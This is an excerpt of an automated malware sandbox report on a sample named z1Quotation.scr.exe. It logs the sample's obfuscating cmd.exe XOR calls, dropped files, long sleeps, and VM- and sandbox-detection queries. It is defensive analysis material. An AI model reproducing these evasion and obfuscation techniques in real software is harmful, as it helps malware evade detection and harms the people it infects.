                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_6D431B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6D431B28
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044693D push ecx; ret 137_2_0044694D
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044DB70 push eax; ret 137_2_0044DB84
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044DB70 push eax; ret 137_2_0044DBAC
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00451D54 push eax; ret 137_2_00451D61
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0044B090 push eax; ret 138_2_0044B0A4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0044B090 push eax; ret 138_2_0044B0CC
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00451D34 push eax; ret 138_2_00451D41
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00444E71 push ecx; ret 138_2_00444E81
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00414060 push eax; ret 139_2_00414074
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00414060 push eax; ret 139_2_0041409C
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00414039 push ecx; ret 139_2_00414049
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_004164EB push 0000006Ah; retf 139_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00416553 push 0000006Ah; retf 139_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00416555 push 0000006Ah; retf 139_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00445240 push eax; ret 140_2_00445254
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00445240 push eax; ret 140_2_0044527C
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_0044C670 push esp; retf 140_2_0044C671
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_0044C6B4 push eax; ret 140_2_0044C6C1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00444EA1 push ecx; ret 140_2_00444EB1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00414060 push eax; ret 146_2_00414074
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00414060 push eax; ret 146_2_0041409C
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00414039 push ecx; ret 146_2_00414049
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_004164EB push 0000006Ah; retf 146_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00416553 push 0000006Ah; retf 146_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00416555 push 0000006Ah; retf 146_2_004165C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dllJump to dropped file
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dllJump to dropped file
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Siskenernes.Mom105Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Overtakes.flyJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Fodterapeut.BewJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Perichord.strJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Septifragal.flaJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Sesquihydrated12.txtJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Terpe.datJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\JolinesJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines\spirographin.surJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines\talpatate.lukJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,138_2_004047CB
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Mass process execution to delay analysis
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk Where DriveType=3
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\SysWOW64\dxdiag.exeSystem information queried: FirmwareTableInformation
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeAPI/Special instruction interceptor: Address: 3556B09
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,137_2_0040DD85
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeWindow / User API: threadDelayed 9897Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dllJump to dropped file
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dllJump to dropped file
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeAPI coverage: 9.9 %
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe TID: 3672Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe TID: 1992Thread sleep time: -264000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe TID: 1992Thread sleep time: -29691000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00403A04 GetSystemTimeAsFileTime followed by cmp: cmp eax, 03h and CTI: jne 00403A46h140_2_00403A04
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00403A04 GetSystemTimeAsFileTime followed by cmp: cmp eax, 02h and CTI: jne 00403A59h140_2_00403A04
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00403A04 GetSystemTimeAsFileTime followed by cmp: cmp eax, 04h and CTI: jne 00403A82h140_2_00403A04
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00403A04 GetSystemTimeAsFileTime followed by cmp: cmp eax, 05h and CTI: jne 00403A97h140_2_00403A04
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_00405B60 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405B60
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_00406731 FindFirstFileA,FindClose,0_2_00406731
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_004027AF FindFirstFileA,0_2_004027AF
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0040AE51 FindFirstFileW,FindNextFileW,137_2_0040AE51
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,138_2_00407EF8
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,139_2_00407898
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_004098C4 FindFirstFileW,FindNextFileW,140_2_004098C4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,146_2_00407898
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00418981 memset,GetSystemInfo,137_2_00418981
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzqJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzvJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Temp\hhsvynxtJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: z1Quotation.scr.exe, 00000082.00000003.35991202437.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35979025881.0000000007422000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968794940.0000000007422000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35989039555.0000000007422000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968794940.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35959037232.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35959037232.0000000007422000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35979025881.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991202437.0000000007422000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121957679.0000000007422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: z1Quotation.scr.exe, 00000000.00000002.33494425602.00000000028EE000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000000.00000002.33495375188.0000000004E90000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: hgFs=
                Source: z1Quotation.scr.exe, 00000082.00000003.33237027260.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-5031
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-4864
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeAPI call chain: ExitProcess graph end nodegraph_138-34112
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_00403F44 SetWindowPos,ShowWindow,GetWindowLongA,ShowWindow,DestroyWindow,SetWindowLongA,GetDlgItem,SendMessageA,IsWindowEnabled,SendMessageA,GetDlgItem,LdrInitializeThunk,GetDlgItem,GetDlgItem,SetClassLongA,LdrInitializeThunk,SendMessageA,LdrInitializeThunk,LdrInitializeThunk,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,LdrInitializeThunk,GetSystemMenu,EnableMenuItem,SendMessageA,LdrInitializeThunk,SendMessageA,SendMessageA,lstrlenA,SetWindowTextA,DestroyWindow,CreateDialogParamA,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow,0_2_00403F44
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,137_2_0040DD85
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_6D431B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6D431B28
